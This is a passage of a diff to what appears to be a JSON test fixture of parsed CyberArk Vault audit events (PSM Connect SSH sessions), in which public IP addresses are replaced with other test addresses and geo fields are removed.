\u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1220,39 +1100,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1269,7 +1128,7 @@ }, "@timestamp": "2021-03-15T10:33:39.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1280,16 +1139,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:39Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1301,13 +1159,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1317,9 +1175,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:33:39", "desc": "PSM Connect" @@ -1330,8 +1188,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936290300Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331187900Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1354,39 +1212,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1403,7 +1240,7 @@ }, "@timestamp": "2021-03-15T10:35:00.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1414,16 +1251,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:35:00Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1435,13 +1271,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1451,9 +1287,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating 